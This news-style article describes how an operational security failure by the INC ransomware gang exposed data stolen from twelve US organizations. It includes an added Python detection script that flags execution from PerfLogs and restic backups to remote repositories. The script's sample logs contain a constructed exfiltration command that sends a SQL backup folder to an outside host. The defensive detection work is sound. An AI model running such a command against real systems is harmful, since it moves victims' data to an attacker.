Security Failure Exposes Ransomware Gang's Operations
A recent investigation uncovered a significant operational security failure by the INC ransomware gang, allowing researchers to recover stolen data from a dozen US organizations.
What Went Wrong for the Ransomware Gang?
The gang's mistake led to the exposure of their tooling and infrastructure, which stored data exfiltrated from multiple victims. Among the exposed tooling was a RainINC ransomware variant that had been executed from the PerfLogs directory.
Investigation and Findings
The investigation began after a US organization detected ransomware encryption activity on a production SQL Server. The researchers found restic-related remnants indicating the threat actor's use of the backup tool as part of their operational toolkit.
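Two of the indicators described above, execution from the PerfLogs directory and restic being used as an exfiltration tool, can be turned into simple process-creation detections. The following is an added example, not code from the article or from the investigating firm: it runs two heuristics over constructed sample log lines in a simplified pipe-delimited format (timestamp, host, parent image, image, command line). The hosts, paths, repository URL and IP address are all made up for the example; the rest: and s3: repository syntax is restic's own.

```python
"""Detection heuristics for two indicators from the INC ransomware case:
a binary executed from C:\\PerfLogs, and restic run with a remote
repository (the gang used the backup tool to move stolen data).
All log lines below are constructed samples, not real telemetry."""
import ntpath
import re
from dataclasses import dataclass

# Constructed sample events: timestamp|host|parent_image|image|command_line
SAMPLE_LOGS = r"""
2024-05-01T10:00:01|sql01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
2024-05-01T10:02:14|sql01|C:\Windows\System32\cmd.exe|C:\PerfLogs\update.exe|update.exe --start
2024-05-01T10:03:09|sql01|C:\Windows\System32\cmd.exe|C:\PerfLogs\restic.exe|restic.exe -r rest:https://203.0.113.10:8000/repo backup D:\SQLBackups
2024-05-01T10:05:00|fs02|C:\Program Files\BackupApp\agent.exe|C:\Program Files\restic\restic.exe|restic.exe -r s3:s3.amazonaws.com/corp-backups backup E:\Shares
"""

# restic repository prefixes that point at a network location rather than local disk
REMOTE_BACKENDS = ("rest:", "s3:", "sftp:", "b2:", "azure:", "gs:", "rclone:")
# Directories where a legitimately deployed backup tool is expected to live (assumption)
EXPECTED_TOOL_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    severity: str
    image: str


def parse_line(line):
    """Split one pipe-delimited event; return None for blank or malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmdline = parts
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def restic_remote_repo(cmdline):
    """Return the repository target if restic is told to back up to a remote backend."""
    m = re.search(r"(?:^|\s)(?:-r|--repo)\s+(\S+)", cmdline)
    if not m:
        return None
    repo = m.group(1)
    if not re.search(r"(?:^|\s)backup(?:\s|$)", cmdline):
        return None
    return repo if repo.lower().startswith(REMOTE_BACKENDS) else None


def analyze(log_text):
    """Apply both heuristics to every event and return the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        image_l = ev["image"].lower()
        # Rule 1: anything executing out of PerfLogs is abnormal; it is a log folder, not a program folder.
        if image_l.startswith("c:\\perflogs\\"):
            findings.append(Finding(ev["ts"], ev["host"], "exec_from_perflogs", "high", ev["image"]))
        # Rule 2: restic backing up to a remote repository. Legitimate backup agents do this too,
        # so severity depends on whether the binary lives where an admin would have installed it.
        is_restic = ntpath.basename(image_l) == "restic.exe" or re.search(r"\brestic(?:\.exe)?\s", ev["cmdline"].lower())
        if is_restic and restic_remote_repo(ev["cmdline"]):
            sev = "low" if image_l.startswith(EXPECTED_TOOL_DIRS) else "high"
            findings.append(Finding(ev["ts"], ev["host"], "restic_backup_to_remote_repo", sev, ev["image"]))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.timestamp} {f.host} {f.severity:4} {f.rule} {f.image}")
```

The second rule is deliberately not an alert on restic alone: backup tools are common and legitimate, so the useful signal is the combination of a remote repository target with an unexpected binary location (here PerfLogs), and a real deployment would replace the path allowlist with the organization's own inventory of sanctioned backup software.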
Impact and Implications
The discovery of encrypted data stolen from 12 unrelated organizations in the US has significant implications. The incidents were distinct, unrelated ransomware events, and none of the affected organizations were clients of the investigating firm.